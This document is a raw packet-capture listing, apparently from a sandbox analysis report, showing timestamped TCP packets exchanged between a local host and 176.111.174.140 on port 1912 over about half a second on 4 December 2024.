                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.825505018 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.825769901 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.825853109 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.908946991 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.908973932 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909023046 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909034014 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909075975 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909085989 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909133911 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909142971 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909198046 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909207106 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909286976 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909296036 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909337997 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909347057 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909425020 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909434080 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909487963 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909496069 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909569979 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909579039 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909646034 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909667015 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909684896 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909718990 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909826994 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909842968 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909954071 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.909964085 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910028934 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910085917 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910212040 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910255909 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910343885 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910353899 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910391092 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910430908 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910470963 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910491943 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910515070 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910590887 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910600901 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910621881 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910639048 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910676956 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.910686970 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.920074940 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.920090914 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.926037073 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.926049948 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.926069021 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.926116943 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.926299095 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.926309109 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.926326990 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.926573038 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.926657915 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.947796106 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.947815895 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.947885036 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.947894096 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.947902918 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.948105097 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.948122025 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.948179007 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.948240042 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.948446989 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.948472023 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.948590040 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.948631048 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.948687077 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.948749065 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.948946953 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.948964119 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949035883 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949044943 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949105978 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949114084 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949184895 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949203014 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949244022 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949297905 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949306965 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949350119 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949385881 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949394941 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949413061 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949421883 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949433088 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949454069 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949563980 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949573040 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949632883 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949641943 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949651003 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949661016 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949677944 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949686050 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949693918 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949809074 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949819088 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949883938 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949893951 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949903011 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949923992 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949933052 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949940920 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.949971914 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.950071096 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.950079918 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.950088024 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.950366974 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:48.950459957 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.052798986 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.052820921 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.052839994 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.052850008 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.052896976 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.052942038 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053019047 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053149939 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053159952 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053170919 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053270102 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053307056 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053415060 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053426027 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053525925 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053534985 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053576946 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053592920 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053651094 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053674936 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053780079 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053807020 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.053987026 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054100990 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054114103 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054126024 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054203987 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054236889 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054302931 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054313898 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054339886 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054534912 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054626942 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054685116 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054696083 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054780960 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054792881 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054802895 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054908037 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054917097 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.054984093 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.055035114 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.055047035 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.055063963 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.055156946 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.055166960 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.055206060 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.055273056 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.055362940 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.055372000 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.055471897 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.055527925 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.055536985 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.062886000 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.066936016 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.067028999 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.073764086 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.073798895 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.073856115 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.073940039 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074058056 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074079037 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074091911 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074125051 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074250937 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074260950 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074374914 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074384928 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074420929 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074431896 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074606895 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074615002 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074717999 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074736118 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074832916 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.074886084 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075093985 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075140953 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075200081 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075208902 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075253010 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075272083 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075397015 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075406075 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075434923 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075527906 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075537920 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075572014 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075632095 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075679064 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075736046 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075771093 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075793982 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075803041 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075840950 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.075894117 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076118946 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076128960 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076141119 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076150894 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076170921 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076208115 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076266050 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076273918 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076364994 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076463938 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076472998 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076488018 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076497078 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.076504946 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.078876972 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.078954935 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.187635899 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.187665939 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.187690020 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.187700033 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.187711000 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.187866926 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.187876940 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.187903881 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.187923908 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.187948942 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188000917 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188071012 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188079119 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188091040 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188097954 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188214064 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188251019 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188260078 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188304901 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188358068 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188406944 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188416004 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188487053 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188498020 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188508034 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188525915 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188564062 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188622952 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188632965 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188739061 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188747883 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188757896 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188802004 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188811064 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188821077 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188906908 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188915968 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188977003 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.188985109 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:49.189074039 CET191249739176.111.174.140192.168.2.4
